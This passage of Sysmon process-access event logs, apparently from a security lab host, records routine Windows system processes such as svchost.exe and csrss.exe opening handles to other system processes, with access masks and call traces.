{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6771,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6772,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6773,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6774,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1236\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010497A0900}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"1236","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010497A0900}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6775,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010497A0900}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010497A0900}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6776,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6777,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6778,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6779,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 